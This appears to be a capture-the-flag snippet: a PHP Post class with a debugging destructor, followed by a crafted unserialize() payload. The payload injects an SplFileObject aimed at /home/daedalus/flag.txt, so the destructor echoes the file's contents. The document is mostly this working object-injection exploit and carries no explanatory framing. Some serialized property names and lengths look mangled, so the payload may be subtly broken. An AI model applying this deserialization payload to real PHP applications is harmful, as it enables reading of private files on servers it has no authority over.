- unserialize: documentation ( source)
- htmlspecialchars: documentation ( source)
<?php
class Post {
protected $title;
protected $text;
protected $filters;
function __construct($title, $text, $filters) {
$this->title = $title;
$this->text = $text;
$this->filters = $filters;
}
function get_title() {
return htmlspecialchars($this->title);
}
function display_post() {
$text = htmlspecialchars($this->text);
foreach ($this->filters as $filter)
$text = $filter->filter($text);
return $text;
}
function __destruct() {
// debugging stuff
$s = "<!-- POST " . htmlspecialchars($this->title);
$text = htmlspecialchars($this->text);
foreach ($this->filters as $filter)
$text = $filter->filter($text);
$s = $s . ": " . $text;
$s = $s . " -->";
echo $s;
}
};
echo unserialize('O:4:"Post":3:{s:8:"*title";s:19:"huehuehue i repor u";s:7:"*text";O:13:"SplFileObject":12:{s:24:"SplFileObjectdelimiter";s:1:",";s:24:"SplFileObjectenclosure";s:1:""";s:21:"SplFileObjectescape";s:1:"\";s:20:"SplFileObjectflags";N;s:23:"SplFileObjectfilename";s:23:"/home/daedalus/flag.txt";s:25:"SplFileObjectmaxLineLen";i:0;s:29:"SplFileObjectcurrentLineNum";i:0;s:19:"SplFileObjectrsrc";b:0;s:26:"SplFileObjectcurrentLine";b:0;s:21:"SplFileInfofileName";s:23:"/home/daedalus/flag.txt";s:22:"SplFileInfofileClass";s:13:"SplFileObject";s:22:"SplFileInfoinfoClass";N;}s:10:"*filters";a:0:{}}');